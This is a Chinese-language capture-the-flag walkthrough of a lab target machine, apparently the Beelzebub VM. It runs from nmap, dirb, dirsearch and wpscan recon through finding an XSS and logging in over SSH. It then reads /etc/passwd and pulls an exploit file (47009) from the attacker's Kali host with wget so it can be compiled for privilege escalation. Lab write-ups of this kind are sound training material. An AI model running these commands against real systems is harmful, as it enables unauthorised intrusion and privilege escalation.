靶机2
1.挂代理后能凭通58网段,利用nmap等根据收集目标主机ip和端口,发现192.168.58.133开放22、80端口
2.利用dirb命令扫描http://192.168.58.133的目录
发现一个phpmyadmin网页和index.php网页,尝试访问index.php
提示not found,此时尝试f12查看源码,看看有没有收获 发现注释,
翻译后推断beelzebub应该用md5加密了 在kali里解密得到明文d18e1e22becbd915b45e0e655429d487
3.不妨拆beelzebub为用户名,解密的值为密码,在phpmyadmin登录,结果报错
4.继续尝试利用dirsearch对http://192.168.58.133/d18e1e22becbd915b45e0e655429d487扫描
发现敏感目录upload和很多wp(wordpress)
打开ihttp://192.168.58.133//d18e1e22becbd915b45e0e655429d487/wp-content/uploads/发现文件泄露
这时候随便点点看,发现Talk To VALAK目录点进去跳转到beelzebub网页
5.很明显有个输入框输入1有提示信息,尝试xss注入输入有弹窗确认有xss
养成f12的好习惯,发现有个密码
6.使用wpscan --url http://192.168.58.133/d18e1e22becbd915b45e0e655429d487/ -e u --ignore-main-redirect --force命令扫出用户名( krampus和valak)
将扫出的用户名及找到的密码登录phpmyadmin,发现都不对
7.可以尝试爆破(bp或phpmyadmin多线程爆破)
8.目标主机开了ssh,尝试远程登录发现krampus账户登录成功
利用cat /etc/passwd命令查看当前用户的权限,确定为普通用户
提权,尝试登录root用户,不行,找其他方式
先ls查看一下,发现有个.bash_history文件
使用more查看发现一个域名,且用的wget命令,所以这个网址可能有信息
下载下来,ls看到有个47009的文件 在kali中使用命令python3 -m http.server 80,将47009传给目标主机终端
在目标主机终端用命令wget 10.16.0.78/47009接受kali的47009文件
9.用gcc 47009 -o exploit命令使用47009文件
提示已存在